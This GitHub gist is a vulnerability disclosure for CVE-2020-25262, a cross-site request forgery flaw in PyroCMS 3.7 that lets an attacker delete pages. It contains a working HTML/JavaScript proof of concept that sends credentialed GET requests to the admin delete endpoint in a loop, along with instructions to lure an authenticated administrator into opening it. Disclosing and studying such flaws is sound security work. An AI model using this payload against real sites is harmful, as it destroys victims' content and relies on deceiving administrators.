Skip to content

Instantly share code, notes, and snippets.

@farid007
Last active October 16, 2020 21:57
Show Gist options
  • Save farid007/2af454d909fa5a60a07e4e547e99964e to your computer and use it in GitHub Desktop.
Save farid007/2af454d909fa5a60a07e4e547e99964e to your computer and use it in GitHub Desktop.
CSRF in PyroCMS Which leads to deletion of pages (CVE-2020-25262)
Product-: PyroCMS
CVE: CVE-2020-25262
Version: (,3.7) 3.7 Tested
Vulnerability-: Deletion of pages via Cross-Site Request Forgery(CSRF).
Download-: https://github.com/pyrocms/pyrocms
Vulnerability Description-: The PyroCMS is vulnerable to cross-site request forgery (CSRF). Due to action is performed via GET request. An attacker can leverage this vulnerability by creating a form and host this form on his server and share this link to victims through social engineering methods. Once the victims who are already authenticated to the PyroCMS, click upon the link, unintended actions will be performed on the victim's behalf and Pages will be deleted.
Steps To Reproduce-:
Create a page with below content.
<!DOCTYPE>
<html>
<head>
<title></title>
<script type="text/javascript">
// to delete pages.
// it's in your hand to delete number of pages.
var url = "http://test.com/admin/pages/delete/"
for (var i = 1; i <= 13 ; i++) {
var url1 = url+i;
xhr = new XMLHttpRequest();
xhr.open("GET",url1);
xhr.withCredentials = true;
xhr.send(null);
}
</script>
</head>
<body>
<--html content here--!>
</body>
</html>
* Send to the victim (who is authenticated on PyroCMS as administrator) and once the victim clicks on the link, pages will be deleted.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment